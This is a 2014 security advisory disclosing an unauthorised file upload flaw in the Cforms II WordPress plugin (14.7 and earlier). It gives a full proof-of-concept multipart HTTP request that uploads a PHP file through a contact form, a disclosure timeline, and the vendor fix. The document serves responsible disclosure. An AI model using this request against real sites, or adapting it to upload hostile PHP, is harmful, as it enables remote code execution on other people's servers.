Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7
Advisory ID: -
Author: Zakhar Fedotkin
Affected Software: Wordpress Plugin Cforms II 14.x-14.7 (Release: 12th Nov 2014)
Vendor URL: https://wordpress.org/plugins/cforms2/
Vendor Status: fixed
CVE-ID: -
The Cforms 14.7 and before are vulnerable to unauthorised user file upload. It's affected contact forms thats was created without file upload box. File lib_nonajax.php accept files with all extensions, that could lead to remote code execution
POC:
Request to the valid contact form looks like:
POST /wordpress/ HTTP/1.1
β¦
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------13530703071348311666826727318
Content-Length: 1747
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_1"
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_2"
test
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_3"
[email protected]
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_4"
http://
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_uploadfile2[]"; filename="up.php"
Content-Type: text/php
<? phpinfo(); ?>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_working2"
<span>One%20moment%20pleaseβ¦</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_failure2"
<span>Please%20fill%20in%20all%20the%20required%20fields.</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_codeerr2"
<span>Please%20double-check%20your%20verification%20code.</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_customerr2"
yyy
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_popup2"
nn
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="sendbutton2"
1
-----------------------------13530703071348311666826727318β
The error is in lib_nonajax.php and default settings lib_nonajax.php allow to upload files to the default directory for versions below 14β¦6.3 it is cfroms plugin home directory. For version 14.6.3 and after it is wordpress upload directory. Default settings for contact form without upload field is None, so it's possible to upload *.php file.
Update to the latest version
15-Dec-2014 ? found the vulnerability
22-Dec-2014 - informed the developers
23-Dec-2014 - response by vendor
27-Dec-2014 ? fix by vendor
29-Dec-2014 - release date of this security advisory
29-Dec-2014 - post on Bugtraq
Vulnerability found and advisory written by Zakhar Fedotkin.